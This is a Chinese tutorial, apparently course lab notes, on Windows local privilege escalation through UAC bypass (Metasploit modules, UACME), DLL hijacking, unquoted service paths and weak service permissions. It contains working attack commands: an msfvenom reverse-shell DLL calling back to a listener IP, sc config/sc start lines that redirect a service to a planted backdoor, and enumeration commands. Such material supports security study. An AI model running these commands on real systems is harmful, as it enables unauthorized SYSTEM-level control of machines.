【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限

这篇具有很好参考价值的文章主要介绍了【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

文章内容复现于小迪安全相关课程

Win7&10-BypassUAC自动提权-MSF&UACME

用户账户控制-UAC

用户帐户控制User Account Control,简写作UAC)是 微软 公司在其 Windows Vista 及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对 应用程序 使用 硬盘驱动器 系统文件 授权,以达到帮助阻止 恶意程序 (有时也称为“ 恶意软件 ”)损坏系统的效果。

四种级别

总是通知将会:
当程序试图安装软件或对电脑做出更改时通知你。
当你对 Windows 设置进行更改时通知你。
冻结其他任务,直到你做出响应。
注意:如果你经常安装新软件或访问陌生网站,则推荐使用此选项。
仅当相关程序尝试更改我的计算机时通知我
当程序试图安装软件或对电脑做出更改时通知你。
当你对 Windows 设置进行更改时不通知你。
冻结其他任务,直到你做出响应。
注意:如果你经常安装新软件或访问不熟悉的网站,但更改 Windows 设置时不希望收到通知,则建议使用此选项。
仅当相关程序尝试更改计算机时通知我(不降低桌面亮度)
当程序试图安装软件或对电脑做出更改时通知你。
当你对 Windows 设置进行更改时不通知你。
不会冻结其他任务或等待响应。
注意:如果需要花费很长时间才能降低计算机上的桌面亮度时,才建议选择此选项。否则,建议选择上面的一种选项。
从不通知(禁用 UAC)将会:
当程序试图安装软件或对电脑做出更改时不通知你。
当你对 Windows 设置进行更改时不通知你。
不会冻结其他任务或等待响应。
注意:出于安全考虑,此选项不推荐使用。

为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

绕过项目:MSF内置,UACME项目(推荐),Powershell渗透框架

开启UAC和未开启UAC时,MSF默认getsystem提权影响(进程注入)

未开启UAC getsystem直接提权成功:

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

开启UAC msf直接提权不成功:

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

1、MSF模块:

-Test in Win7 本地电脑 本地权限

use exploit/windows/local/bypassua
【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

该模块不适用于win10操作系统:

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

-Test in Win10 本地电脑 本地权限

use exploit/windows/local/ask #对方电脑弹框,需要目标电脑确定,但是通杀各种版本
【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

录制的视频有点大(一分半),插不进来,详见百度云视频链接

use exploit/windows/local/bypassuac_sluihijack
【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档
use exploit/windows/local/bypassuac_silentcleanup #使用方法类似,适用于win10操作系统

2、UACME项目:百度云链接

https://github.com/hfiref0x/UACME(可以自己下载最新版本源代码自行编译,百度云中是编译好的)

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.
x86-32/x64 Windows 7/8/8.1/10/11 (client, some methods however works on server version too).
Admin account with UAC set on default settings required.

Run examples: 61个选项即61种方式绕过UAC

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档
akagi32.exe 23
akagi64.exe 61
akagi32 23 c:\windows\system32\calc.exe
akagi64 61 c:\windows\system32\charmap.exe
好用的编号 23  61
Akagi64.exe 编号 调用执行
【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

调用后门程序如果没反应的话就多尝试其他编号

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

3、Powershell渗透框架:

暂时搁置……

Win2012-DLL劫持提权应用配合MSF-FlashFXP

程序运行过程中加载的动态链接库;limux下以so为后缀

原理:Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。

通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)

过程:信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功

检测: ChkDllHijack 火绒剑

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

上方dll文件在C:\Windows目录下,普通用户权限不够,不能够劫持。下方dll文件在程序当前目录下,可以尝试劫持。

项目:https://github.com/anhkgg/anhkgg-tools 百度云链接

拖入程序,输入相关进程路径,检测能否劫持

能够劫持 测试程序flashfxp(模拟对方服务器上部署的ftp服务) 百度云链接

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

‘’不能劫持

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

利用火绒剑进行进程分析加载DLL,一般寻程序DLL利用。

msf生成 dll劫持文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.146 lport=4444 -f dll -o ssleay32.dll

提前信息收集相关软件及DLL问题程序,本地调试成功后覆盖DLL实现利用

条件:需要管理员去触发执行靶机上flashfxp程序,实现dll劫持

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

不带引号服务路径配合MSF-MacroExpert

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。
过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

检测项目:JAWS

https://github.com/411Hall/JAWS

Usage:

Run from within CMD shell and write out to file.

CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

Run from within CMD shell and write out to screen.

CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

Run from within PS Shell and write out to file.

PS C:\temp> .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt
带引号:
"C:\Program Files (x86)\Common Files\Adobe\AdobeUpdateService.exe"
带引号 有空格的目录还是一个整体
不带引号:
C:\Progra m Files (x86)\Common Files\Adobe\AdobeUpdateService.exe(中间有空格)
不带引号 有空格的目录就会认为是文件加参数
条件:需要目标靶机可以运行powershell脚本,

Test in win server 2008

这里我直接在靶机上直接运行的脚本,powershell上实在太慢了

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

生成了一个455kb的结果,截取其中我们想要获取的部分

【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档
以 C:\Program Files (x86)\Windows Media Player\wmplayer.exe 为例,我们将后门改查Program.exe 并且上传至C盘根目录下,等到服务器重启或者对应服务重启后,后门以system权限上线。
【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

检测命令:(功能同JAWS 并且排查winodws下目录(windows目录下权限不够))

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限,# 权限提升,windows,microsoft,网络安全,Powered by 金山文档

上传反弹exe,设置好对应执行名后,执行sc start "OfficeUpdateService"

不安全的服务权限配合MSF-NewServices

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。
过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功
检测脚本:accesschk PowerUp(PowerSploit)

1、accesschk.exe -uwcqv "administrators" *   #检测所有服务以权限
2、Import-Module .\PowerUp.ps1
Invoke-All Checks

重点关注 权限为 SERVICE_ALL_ACCESS 的服务

https://github.com/PowerShellMafia/PowerSploit

https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk文章来源地址https://www.toymoban.com/news/detail-754444.html

sc config "OfficeUpdateService" binpath="C:\Program.exe" #需要本地用户权限 webshell权限不行
sc start OfficeUpdateService
注:路径的空格引号问题 但是没有修改服务本身路径的权限
服务权限问题 可以修改服务对应的路径

部分复现有丢失,后续再补

到了这里,关于【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Linux中普通用户如何使用sudo指令提升权限

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 普通用户为何无法使用sudo? 我们来看一下具体操作 总结 世上有两种耀眼的光芒,一种是正在升起的太阳,一种是正在努力学习编程的你!一个爱学编程的人。各位看官,我衷心的希望这篇博

    2024年01月24日
    浏览(29)
  • CVE-2023-36874 Windows错误报告服务本地权限提升漏洞分析

    漏洞简介 Windows错误报告服务在提交错误报告前会创建 wermgr.exe 进程,而攻击者使用特殊手法欺骗系统创建伪造的wermgr.exe进程,从而以 system 权限执行代码。 影响版本 危害等级 7.8 ∣ H I G H textcolor{Red}{7.8 | HIGH} 7.8∣ H I G H 漏洞复现 首先在C盘下创建一个目录testsystem32,然后将

    2024年02月11日
    浏览(25)
  • Linux Polkit本地权限提升漏洞(CVE-2021-4034)的修复方式建议

    近日,网络上出现 Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。目前该漏洞PoC已公开。 漏洞描述 Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进程进行通信的有组织的方式。 CVE-2021-4

    2024年02月10日
    浏览(30)
  • 权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC

    1、具体有哪些权限需要我们了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等 2、以上常见权限获取方法简要归类说明? 后台权限:SQL注入 , 数据库备份泄露,默认或弱口令等获取帐号密码进入 网站权限:后台提升至网站权限,RCE或文件操

    2024年02月10日
    浏览(26)
  • win11添加不了本地用户和组?

    很多用户都想要感受win11系统带来的操作体验,所以纷纷升级或者直接下载安装,但是新的系统在操作方式和外观上是有所不同的,需要小伙伴慢慢的摸索才能够熟练掌握,今天小编要给大家介绍的就是win11添加不了本地用户和组的解决办法,一起来瞧瞧。 win11添加不了本地用

    2024年02月12日
    浏览(171)
  • dll劫持

    dll为动态链接库文件,又称\\\"应用程序拓展\\\",是软件文件类型。在Windows中许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库文件,即dll文件,放置于系统中,个人理解类似于我们编程中引入的模块。 静态编译 :debug状态下:MTd release状态下:

    2024年02月05日
    浏览(23)
  • 白加黑(dll劫持)

    DLL劫持已经是一个很古老成熟对技术了,以前就有看到有许多人用来做游戏外挂(2008年左右甚至更早以前),近期我了解到现在还有许多对人使用DLL劫持做权限维持,因为之前只是一直知道这个技术原理但是却没有实际使用过,并且最近看到有人开源了一份非常不错的检测工具

    2024年04月14日
    浏览(24)
  • msdtc.exe dll劫持

    msdtc.exe是微软 分布式传输协调程序 。该进程调用系统 Microsoft Personal Web Server 和 Microsoft SQL Server 。该服务用于管理多个服务器。 msdtc.exe是一个并列事务,是分布于两个以上的数据库,消息队列,文件系统或其他事务保护资源管理器,删除要小心。 对应服务MSDTC,全称Distrib

    2024年02月04日
    浏览(27)
  • 使用Delphi编写DLL劫持内存补丁

    在有些破解程序时,不能暴力修改程序,修改后,程序就不能正常运行,因为很多程序启动时有自我的校验,但是当程序加载到内存后,在内存中修改相应的地方就可以达到破解的效果。那么怎样在不破坏程序的前提下,达到修改程序呢? 当一个可执行文件运行时,Windows加

    2024年02月15日
    浏览(59)
  • 内核中劫持线程注入DLL并隐藏

    在本文中,我们将讨论如何在Windows驱动层劫持进程线程、注入DLL并隐藏注入后的内存。但请注意,本文描述的方法仅用于教育和研究目的,不得用于非法或恶意目的。对于任何可能导致对他人计算机、数据或设备造成损害的行为,本文概不负责。 以下是在Windows驱动层劫持进

    2024年02月20日
    浏览(29)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包